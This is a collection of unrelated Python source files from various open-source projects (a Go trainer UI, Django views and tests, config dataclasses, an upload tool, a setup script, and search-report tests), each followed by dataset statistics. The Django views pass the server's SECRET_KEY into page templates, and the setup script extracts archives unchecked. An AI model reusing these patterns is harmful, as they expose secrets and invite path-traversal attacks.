xsettings.add_widget(LabelledIntInput(size_hint=(0.5, 1), text=str(self.settings["eval_off_show_last"]), input_property="eval_off_show_last"))
self.add_widget(xsettings)
xsettings = BoxLayout(size_hint=(1, 0.15), spacing=2)
xsettings.add_widget(ScaledLightLabel(text="Show dots/SGF comments for AI players"))
xsettings.add_widget(LabelledCheckBox(size_hint=(0.5, 1), text=str(self.settings["eval_show_ai"]), input_property="eval_show_ai"))
self.add_widget(xsettings)
xsettings = BoxLayout(size_hint=(1, 0.15), spacing=2)
xsettings.add_widget(ScaledLightLabel(text="Disable analysis while in teach mode"))
xsettings.add_widget(LabelledCheckBox(size_hint=(0.5, 1), text=str(self.settings["lock_ai"]), input_property="lock_ai"))
self.add_widget(xsettings)
bl = BoxLayout(size_hint=(1, 0.15), spacing=2)
bl.add_widget(StyledButton(text=f"Apply", on_press=lambda _: self.update_config(False)))
self.info_label = Label()
bl.add_widget(self.info_label)
bl.add_widget(StyledButton(text=f"Apply and Save", on_press=lambda _: self.update_config(True)))
self.add_widget(bl)
def update_config(self, save_to_file=False):
try:
for k, v in self.collect_properties(self).items():
if "::" in k:
k1, i = k.split("::")
i = int(i)
if "alpha" in k1:
v = 1.0 if v else 0.0
if self.ui_settings["eval_colors"][i][3] != v:
self.katrain.log(f"Updating alpha {i} = {v}", OUTPUT_DEBUG)
self.ui_settings["eval_colors"][i][3] = v
elif "save_feedback" in k1:
if self.sgf_settings[k1][i] != v:
self.sgf_settings[k1][i] = v
self.katrain.log(f"Updating setting sgf/{k1}[{i}] = {v}", OUTPUT_DEBUG)
else:
if self.settings[k1][i] != v:
self.settings[k1][i] = v
self.katrain.log(f"Updating setting trainer/{k1}[{i}] = {v}", OUTPUT_DEBUG)
else:
if self.settings[k] != v:
self.settings[k] = v
self.katrain.log(f"Updating setting {k} = {v}", OUTPUT_DEBUG)
if save_to_file:
self.katrain.save_config()
self.popup.dismiss()
except InputParseError as e:
self.info_label.text = str(e)
self.katrain.log(e, OUTPUT_ERROR)
return
self.katrain.update_state()
self.popup.dismiss()
# ---- Chessboard.py | repo: choyai/basic-chess | license: MIT ----
import numpy as np
class Square:
def __init__( self, value, x, y ):
self.value = value
self.color = (x + y) % 2
self.x = x
self.y = y
    def __repr__(self):
        return str(self.value) + ' ' + str((self.x, self.y))
class Chessboard:
def __init__(self):
self.squares = []
self.state = np.zeros((8, 8))
for i in range(8):
for j in range(8):
square = Square(0, i, j)
self.squares.append(square)
def __repr__(self):
        return self.state.__repr__()
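`Square.__init__` derives the square colour from `(x + y) % 2`. The parity rule alone can be checked standalone (`square_color` is a hypothetical helper, not part of the class):

```python
def square_color(x, y):
    # 0 for one colour, 1 for the other; adjacent squares always differ
    return (x + y) % 2

row = [square_color(x, 0) for x in range(8)]
print(row)  # [0, 1, 0, 1, 0, 1, 0, 1]
```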
# ---- server/main_app/views.py | repo: impatrq/safe | license: MIT ----
import os
import json
import requests
from django.http.response import HttpResponse, JsonResponse
from django.conf import settings
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.contrib.auth import login as auth_login, logout as auth_logout
from api_tables.models import User
from api_tables.forms import WorkerForm, DoorForm
# Create your views here.
@login_required(login_url='/login/')
def index(request):
return render(request, 'index.html', {'sk': os.environ.get('SECRET_KEY')})
def login(request):
if request.method == 'POST':
request.POST = request.POST.copy()
request.POST['SECRET_KEY'] = os.environ.get("SECRET_KEY")
json_response = requests.post(settings.CURRENT_HOST + '/api/auth/login/', data=request.POST).json()
if json_response['authorized'] == 'true':
user = User.objects.get(id=json_response['user_id'])
auth_login(request, user)
return redirect('main-index')
else:
return render(request, 'login.html', {'error': json_response['error_message']})
else:
return render(request, 'login.html', {})
def logout(request):
auth_logout(request)
return redirect('main-login')
@login_required(login_url='/login/')
def workers(request):
form = WorkerForm()
return render(request, 'workers.html', {'form': form, 'sk': os.environ.get('SECRET_KEY')})
@login_required(login_url='/login/')
def doors(request):
form = DoorForm()
return render(request, 'doors.html', {'form': form, 'sk': os.environ.get('SECRET_KEY')})
@login_required(login_url='/login/')
def logs(request):
return render(request, 'logs.html', {'sk': os.environ.get('SECRET_KEY')})
def about_us(request):
    return render(request, 'about-us.html', {})
# ---- threedi_settings/models.py | repo: nens/threedi-settings | license: MIT ----
from dataclasses import dataclass, field
from enum import Enum
from typing import List, Optional
@dataclass
class BaseConfig:
""""""
uid: str # Unique id of setting
sim_uid: str
@dataclass
class PhysicalSimulationConfig(BaseConfig):
use_advection_1d: int
use_advection_2d: int
@dataclass
class TimeStepConfig(BaseConfig):
time_step: float
min_time_step: float
max_time_step: float
use_time_step_stretch: bool
output_time_step: float
@dataclass
class NumericalConfig(BaseConfig):
cfl_strictness_factor_1d: float
cfl_strictness_factor_2d: float
convergence_cg: float
flow_direction_threshold: float
friction_shallow_water_depth_correction: int
general_numerical_threshold: float
time_integration_method: int
limiter_waterlevel_gradient_1d: int
limiter_waterlevel_gradient_2d: int
limiter_slope_crossectional_area_2d: int
limiter_slope_friction_2d: int
max_non_linear_newton_iterations: int
max_degree_gauss_seidel: int
min_friction_velocity: float
min_surface_area: float
use_preconditioner_cg: int
preissmann_slot: float
pump_implicit_ratio: float
limiter_slope_thin_water_layer: float
use_of_cg: int
use_nested_newton: bool
flooding_threshold: float
@dataclass
class AggregationConfig(BaseConfig):
flow_variable: str
method: str
interval: float
name: Optional[str] = ""
@dataclass
class SimulationConfig(BaseConfig):
physical_config: PhysicalSimulationConfig
time_step_config: TimeStepConfig
numerical_config: NumericalConfig
aggregation_config: Optional[List[AggregationConfig]] = field(
default_factory=list
)
class SourceTypes(int, Enum):
ini_file = 1
sqlite_file = 2
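`SimulationConfig.aggregation_config` above uses `field(default_factory=list)` rather than a plain `[]` default. A minimal standalone sketch of why that matters (the `Wrapper` class is illustrative, not from this module):

```python
from dataclasses import dataclass, field
from typing import List

@dataclass
class Wrapper:
    # default_factory builds a fresh list per instance; a bare mutable
    # default (items: List[int] = []) is rejected by dataclasses
    items: List[int] = field(default_factory=list)

a, b = Wrapper(), Wrapper()
a.items.append(1)
print(a.items, b.items)  # [1] []
```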
# ---- devicegroups/tests.py | repo: svelle/Lagerregal | license: BSD-3-Clause ----
from __future__ import unicode_literals
from django.test.client import Client
from django.test import TestCase
from django.urls import reverse
import six
from model_mommy import mommy
from devicegroups.models import Devicegroup
from users.models import Lageruser
class DevicegroupTests(TestCase):
def setUp(self):
self.client = Client()
Lageruser.objects.create_superuser("test", "test@test.com", "test")
self.client.login(username='test', password='test')
def test_devicegroup_creation(self):
devicegroup = mommy.make(Devicegroup)
self.assertEqual(six.text_type(devicegroup), devicegroup.name)
self.assertEqual(devicegroup.get_absolute_url(), reverse('devicegroup-detail', kwargs={'pk': devicegroup.pk}))
self.assertEqual(devicegroup.get_edit_url(), reverse('devicegroup-edit', kwargs={'pk': devicegroup.pk}))
# ---- uai/operation/pack/base_pack_op.py | repo: FinchZHU/uai-sdk | license: Apache-2.0 ----
# Copyright 2017 The UAI-SDK Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
from datetime import datetime
from uai.utils.logger import uai_logger
from ucloud.ufile import putufile
from uai.operation.base_operation import BaseUaiServiceOp
from uai.operation.tar.base_tar_op import UaiServiceTarOp
UFILE_INFO = './ufile_info.log'
CURRENT_PATH = os.getcwd()
class UaiServicePackOp(UaiServiceTarOp):
""" The Base Pack Tool Class with UAI
"""
def __init__(self, parser):
super(UaiServicePackOp, self).__init__(parser)
self.conf_params = {}
self.filelist = []
self.ufile_info = []
self.platform = ''
def _add_ufile_args(self, pack_parser):
ufile_parse = pack_parser.add_argument_group(
'Ufile-Params', 'Ufile Parameters, help to upload file to Ufile automatically'
)
ufile_parse.add_argument(
'--bucket',
type=str,
required=True,
help='the name of ufile bucket')
def _add_args(self):
super(UaiServicePackOp, self)._add_args()
self._add_account_args(self.parser)
self._add_ufile_args(self.parser)
def _parse_args(self, args):
super(UaiServicePackOp, self)._parse_args(args)
self._parse_account_args(args)
if "ai_arch_v" in args:
if self.platform != args["ai_arch_v"].lower().split('-')[0]:
                raise RuntimeError("ai_arch_v must be a version of " + self.platform)
self.bucket = args['bucket']
def _upload_to_ufile(self):
public_key = self.public_key
private_key = self.private_key
bucket = self.bucket
uai_logger.debug('Start upload file to the bucket {0}'.format(bucket))
handler = putufile.PutUFile(public_key, private_key)
local_file = os.path.join(CURRENT_PATH, self.pack_file_path, self.upload_name)
local_file = local_file.replace('\\', '/')
key = self.upload_name
uai_logger.info('Upload >> key: {0}, local file: {1}'.format(key, local_file))
ret, resp = handler.putfile(bucket, key, local_file)
uai_logger.debug('Ufile response: {0}'.format(resp))
        assert resp.status_code == 200, 'upload failed with status code {0}'.format(resp.status_code)
        uai_logger.debug('Uploaded local file {0} to ufile key {1} successfully'.format(local_file, key))
current_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
self.ufile_info.append('Upload Time: {0}\n'.format(current_time))
self.ufile_info.append('Path of Upload File: {0}\n'.format(key))
def _pack(self):
self._upload_to_ufile()
with open(UFILE_INFO, 'w') as f:
f.write(''.join(self.ufile_info))
def cmd_run(self, args):
self._parse_args(args)
super(UaiServicePackOp, self).cmd_run(args)
self._pack()
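As a standalone sketch of the two-line record format that `_pack` writes out (the `write_ufile_info` helper name and the temp paths here are illustrative, not part of the SDK):

```python
import os
import tempfile
from datetime import datetime

def write_ufile_info(upload_key, info_path):
    # Mirror the record format produced by _upload_to_ufile/_pack:
    # one line with the upload timestamp, one with the uploaded key.
    current_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
    lines = [
        'Upload Time: {0}\n'.format(current_time),
        'Path of Upload File: {0}\n'.format(upload_key),
    ]
    with open(info_path, 'w') as f:
        f.write(''.join(lines))
    return lines

info_path = os.path.join(tempfile.mkdtemp(), 'ufile_info.log')
lines = write_ufile_info('my_pack.tar.gz', info_path)
```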
| 38.822222 | 90 | 0.647682 | 461 | 3,494 | 4.713666 | 0.357918 | 0.033134 | 0.046019 | 0.014726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007366 | 0.222954 | 3,494 | 89 | 91 | 39.258427 | 0.793002 | 0.199485 | 0 | 0 | 0 | 0 | 0.148722 | 0 | 0 | 0 | 0 | 0 | 0.016393 | 1 | 0.114754 | false | 0 | 0.098361 | 0 | 0.229508 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb27a05966e2cdc151b7cb1b1d26243619e72b33 | 778 | py | Python | reader/migrations/0005_managers.py | FroshOU/manga | 60ec24a007a7e9ebe0c152cf1f2a2aa0362f17f2 | [
"MIT"
] | 58 | 2019-03-04T09:22:42.000Z | 2022-02-18T09:11:57.000Z | reader/migrations/0005_managers.py | FroshOU/manga | 60ec24a007a7e9ebe0c152cf1f2a2aa0362f17f2 | [
"MIT"
] | 21 | 2019-03-07T19:34:53.000Z | 2021-12-19T12:46:40.000Z | reader/migrations/0005_managers.py | FroshOU/manga | 60ec24a007a7e9ebe0c152cf1f2a2aa0362f17f2 | [
"MIT"
] | 14 | 2019-06-06T09:53:13.000Z | 2021-12-17T14:34:13.000Z | from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('reader', '0004_aliases'),
]
operations = [
migrations.AddField(
model_name='series',
name='manager',
field=models.ForeignKey(
help_text='The person who manages this series.',
blank=False, null=True, on_delete=models.SET_NULL,
to=settings.AUTH_USER_MODEL, limit_choices_to=models.Q(
('is_superuser', True),
('groups__name', 'Scanlator'),
_connector='OR'
),
),
),
]
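The `limit_choices_to` above admits managers who are superusers OR members of the 'Scanlator' group. A plain-Python sketch of that OR-connected predicate, using hypothetical user dicts instead of Django querysets:

```python
def may_manage(user):
    # Plain-Python equivalent of the OR-connected Q object above:
    # being a superuser or membership in 'Scanlator' each suffices.
    return user.get('is_superuser', False) or 'Scanlator' in user.get('groups', [])

users = [
    {'name': 'alice', 'is_superuser': True, 'groups': []},
    {'name': 'bob', 'is_superuser': False, 'groups': ['Scanlator']},
    {'name': 'carol', 'is_superuser': False, 'groups': []},
]
managers = [u['name'] for u in users if may_manage(u)]
```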
| 29.923077 | 71 | 0.552699 | 72 | 778 | 5.75 | 0.694444 | 0.048309 | 0.077295 | 0.101449 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007843 | 0.344473 | 778 | 25 | 72 | 31.12 | 0.803922 | 0 | 0 | 0.136364 | 0 | 0 | 0.12982 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb2c5307cd59ead7a7f4bf7a140973af81e47bad | 2,099 | py | Python | mapss/static/packages/arches/arches/setup.py | MPI-MAPSS/MAPSS | 3a5c0109758801717aaa8de1125ca5e98f83d3b4 | [
"CC0-1.0"
] | null | null | null | mapss/static/packages/arches/arches/setup.py | MPI-MAPSS/MAPSS | 3a5c0109758801717aaa8de1125ca5e98f83d3b4 | [
"CC0-1.0"
] | null | null | null | mapss/static/packages/arches/arches/setup.py | MPI-MAPSS/MAPSS | 3a5c0109758801717aaa8de1125ca5e98f83d3b4 | [
"CC0-1.0"
] | null | null | null | import sys
import os
import subprocess
import shutil
import urllib.request, urllib.error, urllib.parse
import zipfile
import datetime
import platform
import tarfile
from arches import settings
here = os.path.dirname(os.path.abspath(__file__))
root_dir = os.path.dirname(here)
def install():
# CHECK PYTHON VERSION
if not sys.version_info >= (3, 7):
print("ERROR: Arches requires at least Python 3.7")
sys.exit(101)
else:
pass
return True
def unzip_file(file_name, unzip_location):
try:
# first assume you have a .tar.gz file
tar = tarfile.open(file_name, "r:gz")
tar.extractall(path=unzip_location)
tar.close()
    except tarfile.ReadError:
# next assume you have a .zip file
with zipfile.ZipFile(file_name, "r") as myzip:
myzip.extractall(unzip_location)
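A self-contained check of the tar-first/zip-fallback strategy (the `extract_archive` name and temp paths are illustrative): opening a `.zip` with gzip mode fails, and the fallback branch extracts it instead:

```python
import os
import tarfile
import tempfile
import zipfile

def extract_archive(file_name, unzip_location):
    # Same strategy as unzip_file above: try .tar.gz first, fall back to .zip.
    try:
        tar = tarfile.open(file_name, 'r:gz')
        tar.extractall(path=unzip_location)
        tar.close()
    except tarfile.ReadError:
        with zipfile.ZipFile(file_name, 'r') as myzip:
            myzip.extractall(unzip_location)

workdir = tempfile.mkdtemp()
archive = os.path.join(workdir, 'pkg.zip')
with zipfile.ZipFile(archive, 'w') as z:
    z.writestr('hello.txt', 'hi')
extract_archive(archive, workdir)
```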
def get_version(version=None):
"Returns a PEP 440-compliant version number from VERSION."
version = get_complete_version(version)
# Now build the two parts of the version number:
# major = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|rc}N - for alpha, beta and rc releases
major = get_major_version(version)
sub = ""
if version[3] != "final":
mapping = {"alpha": "a", "beta": "b", "rc": "rc"}
sub = mapping[version[3]] + str(version[4])
return str(major + sub)
def get_major_version(version=None):
"Returns major version from VERSION."
version = get_complete_version(version)
parts = 3
major = ".".join(str(x) for x in version[:parts])
return major
def get_complete_version(version=None):
"""Returns a tuple of the django version. If version argument is non-empty,
then checks for correctness of the tuple provided.
"""
if version is None:
from arches import VERSION as version
else:
assert len(version) == 5
assert version[3] in ("alpha", "beta", "rc", "final")
return version
if __name__ == "__main__":
install()
| 25.91358 | 80 | 0.623154 | 280 | 2,099 | 4.557143 | 0.403571 | 0.087774 | 0.04232 | 0.058777 | 0.10815 | 0.067398 | 0.067398 | 0 | 0 | 0 | 0 | 0.010478 | 0.272511 | 2,099 | 80 | 81 | 26.2375 | 0.825147 | 0.218199 | 0 | 0.078431 | 0 | 0 | 0.112064 | 0 | 0 | 0 | 0 | 0 | 0.039216 | 1 | 0.098039 | false | 0.019608 | 0.215686 | 0 | 0.392157 | 0.019608 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb2ca45bc470c22818c168cb989383dbf565e235 | 3,360 | py | Python | modules/dataproviders/mldataprovider.py | imdatsolak/bender | e20a5c7553d0db60440573b4fc3e907d6a8d5fad | [
"BSD-3-Clause"
] | null | null | null | modules/dataproviders/mldataprovider.py | imdatsolak/bender | e20a5c7553d0db60440573b4fc3e907d6a8d5fad | [
"BSD-3-Clause"
] | null | null | null | modules/dataproviders/mldataprovider.py | imdatsolak/bender | e20a5c7553d0db60440573b4fc3e907d6a8d5fad | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
import logging
import os
from modules.mlbendermodule import MLBenderModule
"""
Class MLDataProvider as described at:
https://wiki.ml.de/pages/viewpage.action?pageId=7144585
Copyright (c) 2019 Imdat Solak
All Rights Reserved
"""
class MLDataProvider(MLBenderModule):
def __init__(self, moduleConfig, configDictionary):
super(MLDataProvider, self).__init__(configDictionary)
self.profile = {
"name" : "mldata-provider",
"class" : "data-provider",
"supported-languages" : [],
}
self.logger = logging.getLogger(os.path.basename(sys.argv[0]))
self.module_config = moduleConfig
self.variables = {
'benderversion': {
'required': [],
'optional': [],
'processor': self._getVersion,
'na-processor': self._cannot
}
}
def initForBender(self, benderInstance):
self.benderCore = benderInstance
def getProvidedVariables(self):
return self.variables
def _getVersion(self, variable, extractedValues):
return '1.1.0b'
def _cannot(self, variable):
return ''
def canProvideDataForVariable(self, variable, dataExtractors, sessionID):
varReqData = []
if variable in self.variables.keys():
varSpec = self.variables[variable]
varRequirements = varSpec['required']
for requiredVariable in varRequirements:
for extractor in dataExtractors:
# TODO: We should not look into the extractor's internal data
# structure but instead have a method for it...
if extractor.canExtractVariable(requiredVariable):
varReqData.append({'requiredVariable' : requiredVariable, 'extractor': extractor})
break
self.logger.info('Var Req Data Len {:d}, varRs {:d}'.format(len(varReqData), len(varRequirements)))
if len(varReqData) < len(varRequirements):
return False, None
else:
return True, varReqData
def cannotProvideDataMessageForVariable(self, variable, dataExtractors, sessionID):
        func = self.variables[variable].get('na-processor', None)
        if func is not None:
            return func(variable)
else:
return None
def provideDataForVariable(self, variable, dataExtractors, sessionID):
canProvideData, dataExtractorSpecs = self.canProvideDataForVariable(variable, dataExtractors, sessionID)
if canProvideData:
extractedValues = {}
if dataExtractors is not None and len(dataExtractors) > 0:
for deSpec in dataExtractorSpecs:
rVar = deSpec['requiredVariable']
dE = deSpec['extractor']
value = dE.getValueForVariableInSession(rVar, sessionID)
extractedValues[rVar] = value
retval = self.variables[variable]['processor'](variable, extractedValues)
self.logger.info('Response is {}'.format(retval))
return retval, False
return None, True
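The class above dispatches through a registry dict that maps each variable name to a spec whose `processor` callable computes the value. A minimal standalone sketch of that pattern (all names here are illustrative):

```python
def _get_version(variable, extracted_values):
    return '1.1.0b'

# Registry in the same shape as self.variables above: each entry names
# its requirements and the processor callable that computes the value.
VARIABLES = {
    'benderversion': {'required': [], 'processor': _get_version},
}

def provide(variable, extracted_values=None):
    spec = VARIABLES.get(variable)
    if spec is None:
        return None, True   # mirrors provideDataForVariable's (value, failed)
    return spec['processor'](variable, extracted_values or {}), False

value, failed = provide('benderversion')
```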
| 37.333333 | 112 | 0.600893 | 292 | 3,360 | 6.869863 | 0.438356 | 0.038883 | 0.061815 | 0.052343 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007729 | 0.306845 | 3,360 | 89 | 113 | 37.752809 | 0.853585 | 0.037798 | 0 | 0.029851 | 0 | 0 | 0.079542 | 0 | 0 | 0 | 0 | 0.011236 | 0 | 1 | 0.119403 | false | 0 | 0.059701 | 0.044776 | 0.328358 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb2e7d5f7c0ebcba291fff0eb900b78cfa2b84c9 | 24,753 | py | Python | tests/integration/test_krkgw_page.py | konrad-kocik/nicelka | a174fce9b8c6d4414312120e89e10bb1e10629df | [
"MIT"
] | null | null | null | tests/integration/test_krkgw_page.py | konrad-kocik/nicelka | a174fce9b8c6d4414312120e89e10bb1e10629df | [
"MIT"
] | null | null | null | tests/integration/test_krkgw_page.py | konrad-kocik/nicelka | a174fce9b8c6d4414312120e89e10bb1e10629df | [
"MIT"
] | null | null | null | from pytest import fixture
from tests.integration.utilities.utilities import get_io_dir_paths, create_dir, remove_dir, run_krkgw_searcher, assert_report_file_content_equals
test_suite = 'krkgw_page'
test_cases = ['no_result',
'no_result_twice',
'single_result',
'single_result_indirect_match_skipped',
'single_result_indirect_match_allowed',
'single_result_duplicate_skipped',
'single_result_duplicate_allowed',
'single_result_twice',
'multiple_results',
'multiple_results_indirect_matches_skipped',
'multiple_results_indirect_matches_allowed',
'multiple_results_duplicate_skipped',
'multiple_results_duplicate_allowed',
'multiple_results_twice',
'multiple_results_on_multiple_pages_all_allowed',
'multiple_results_on_multiple_pages_indirect_matches_skipped',
'multiple_results_with_empty_details',
'basic_use_cases'
]
@fixture(scope='module')
def create_reports_dirs():
for test_case in test_cases:
_, report_dir_path = get_io_dir_paths(test_suite, test_case)
create_dir(report_dir_path)
@fixture(scope='module')
def remove_reports_dirs(request):
def teardown():
for test_case in test_cases:
_, report_dir_path = get_io_dir_paths(test_suite, test_case)
remove_dir(report_dir_path)
request.addfinalizer(teardown)
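The `addfinalizer` teardown above can equivalently be written as a single yield fixture. This sketch drives the same generator control flow by hand, without pytest; list appends stand in for directory creation and removal:

```python
def reports_dirs_fixture(cases, created, removed):
    # Same setup/teardown shape as the two module-scoped fixtures above:
    # code before the yield is setup, code after it is teardown.
    for case in cases:
        created.append(case)
    yield
    for case in cases:
        removed.append(case)

created, removed = [], []
gen = reports_dirs_fixture(['no_result', 'single_result'], created, removed)
next(gen)          # setup: report dirs would be created here
# ... tests would run while the fixture is live ...
next(gen, None)    # teardown: report dirs would be removed here
```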
def test_no_result(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'33-383 MUSZYNKA' + '\n\n' + \
'Results found: 0'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='no_result')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_no_result_twice(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'33-383 MUSZYNKA' + '\n\n' + \
'======================================================================' + '\n' + \
'33-322 JASIENNA' + '\n\n' + \
'Results found: 0'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='no_result_twice')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_single_result(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'21-075 ZEZULIN PIERWSZY' + '\n\n' + \
'Koło Gospodyń Wiejskich "Zezulin" w Zezulinie' + '\n' + \
'Zezulin Pierwszy 22A' + '\n' + \
'21-075 Zezulin Pierwszy' + '\n\n' + \
'Results found: 1'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='single_result')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_single_result_indirect_match_skipped(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'33-334 BOGUSZA' + '\n\n' + \
'Results found: 0'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='single_result_indirect_match_skipped')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_single_result_indirect_match_allowed(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'33-334 BOGUSZA' + '\n\n' + \
'Koło Gospodyń Wiejskich w Boguszach' + '\n' + \
'Bogusze 45' + '\n' + \
'16-100 Bogusze' + '\n\n' + \
'Results found: 1'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='single_result_indirect_match_allowed')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path, allow_indirect_matches=True)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_single_result_duplicate_skipped(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'21-075 ZEZULIN PIERWSZY' + '\n\n' + \
'Koło Gospodyń Wiejskich "Zezulin" w Zezulinie' + '\n' + \
'Zezulin Pierwszy 22A' + '\n' + \
'21-075 Zezulin Pierwszy' + '\n\n' + \
'======================================================================' + '\n' + \
'21-075 ZEZULIN PIERWSZY' + '\n\n' + \
'Results found: 1'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='single_result_duplicate_skipped')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_single_result_duplicate_allowed(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'21-075 ZEZULIN PIERWSZY' + '\n\n' + \
'Koło Gospodyń Wiejskich "Zezulin" w Zezulinie' + '\n' + \
'Zezulin Pierwszy 22A' + '\n' + \
'21-075 Zezulin Pierwszy' + '\n\n' + \
'======================================================================' + '\n' + \
'21-075 ZEZULIN PIERWSZY' + '\n\n' + \
'Koło Gospodyń Wiejskich "Zezulin" w Zezulinie' + '\n' + \
'Zezulin Pierwszy 22A' + '\n' + \
'21-075 Zezulin Pierwszy' + '\n\n' + \
'Results found: 2'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='single_result_duplicate_allowed')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path, allow_duplicates=True)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_single_result_twice(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'22-234 SĘKÓW' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH "BUBNOWSKIE BABY"' + '\n' + \
'Sęków 15' + '\n' + \
'22-234 Sęków' + '\n\n' + \
'======================================================================' + '\n' + \
'21-421 ZASTAWIE' + '\n\n' + \
'Koło Gospodyń Wiejskich w Zastawiu' + '\n' + \
'Zastawie 47A' + '\n' + \
'21-421 Zastawie' + '\n\n' + \
'Results found: 2'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='single_result_twice')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'38-315 KUNKOWA' + '\n\n' + \
'Koło Gospodyń Wiejskich i Gospodarzy w Kunkowej' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Koło Gospodyń Wiejskich w Kunkowej i Leszczynach' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Results found: 2'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_indirect_matches_skipped(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'33-393 MARCINKOWICE' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W MARCINKOWICACH' + '\n' + \
'Marcinkowice 124' + '\n' + \
'33-393 Marcinkowice' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W MARCINKOWICACH' + '\n' + \
'Marcinkowice 104' + '\n' + \
'33-393 Marcinkowice' + '\n\n' + \
'Koło Gospodyń Wiejskich "Marcinkowicanki"' + '\n' + \
'Marcinkowice 47' + '\n' + \
'33-273 Marcinkowice' + '\n\n' + \
'Results found: 3'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_indirect_matches_skipped')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_indirect_matches_allowed(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'24-100 TOMASZÓW' + '\n\n' + \
'Koło Gospodyń Wiejskich w Tomaszowie' + '\n' + \
'Tomaszów lok. 39' + '\n' + \
'24-100 Tomaszów' + '\n\n' + \
'Koło Gospodyń Wiejskich w Tomaszowie' + '\n' + \
